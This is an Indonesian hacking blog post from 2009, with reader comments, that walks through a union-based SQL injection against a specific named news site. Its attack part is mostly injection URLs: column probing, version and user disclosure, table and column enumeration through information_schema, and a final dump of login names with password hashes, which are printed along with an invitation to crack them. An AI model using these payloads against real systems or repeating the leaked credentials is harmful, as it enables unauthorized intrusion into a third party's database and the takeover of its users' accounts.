|
| |
Main » 2009 » March » 2 » SQL INJEKTION
SQL INJEKTION | 7:09 PM |
SQL INJEKTION
contoh target kita kali ini dari dalam negeri ajah ya... :)
http://www.solusisehat.net/berita.php?id=227
keluarin magic numbernya
http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--
angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number
sekarang coba kita liat versi, database dan user dari target
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7--
nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :)
sekarang kita liat table2 yang ada didalam databasenya
disini gw make command information_schema untuk ngeluarin table sama columnnya.
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()--
command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database()
masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya
kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya
nah keliatan semua table yang ada dalam databasenya kan?
disini kita hanya akan mencari loginnya ajah ya...
diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user
sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572
http://www.paulschou.com/tools/xlate/ <-- konvertnya disini
lalu kita keluarin columnnya
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--
command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]
[nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572
group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572
nah disini kita bisa liat column yang ada dalam table ssc_user
sekarang kita akan ngeluarin informasi dari column nama_login dan sandi
http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--
admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc
sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?
tinggal dicrack ajah deh xixixi.. :)
|
|
Category: Hacking |
Views: 755 |
Added by: herman
| Rating: 0.0/0 |
|
| Total comments: 6 | |
|
6
admin
(2009-09-16 9:14 PM)
0
@budi: saya juga bingung pak.. aneh tuh, blun tau saya gmana crack gituan.. @breres : sda mas @Furkan: saya yang tau versi 5 mas.
|
5
Budi
(2009-09-12 3:09 PM)
0
cracknya pake apa nich
|
4
Budi
(2009-09-12 2:56 PM)
0
untuk passnya diDescrypt/ encrypt pake apa ya
|
3
breres
(2009-04-16 1:50 PM)
0
o iya balas ke email saya jg yah he_doank@telkom.net
|
2
breres
(2009-04-16 1:50 PM)
0
bro... pass na itu di encrypt pake apa yah?
|
1
Furkan
(2009-03-04 3:25 PM)
0
Masih Gk ngerti yang gituan nehhh, klo versi2na beda beda juga trus gimana carana yahh
|
|
|
|
|
|
| Calendar |
| « March 2009 » |
| Su |
Mo |
Tu |
We |
Th |
Fr |
Sa |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | | 8 | 9 | 10 | 11 | 12 | 13 | 14 | | 15 | 16 | 17 | 18 | 19 | 20 | 21 | | 22 | 23 | 24 | 25 | 26 | 27 | 28 | | 29 | 30 | 31 | |
|
| Statistics |
Total online: 1 Guests: 1 Users: 0 |
|
Jumlah pengunjung:
|